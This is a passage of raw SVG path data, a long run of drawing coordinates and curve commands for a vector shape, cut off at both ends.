3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,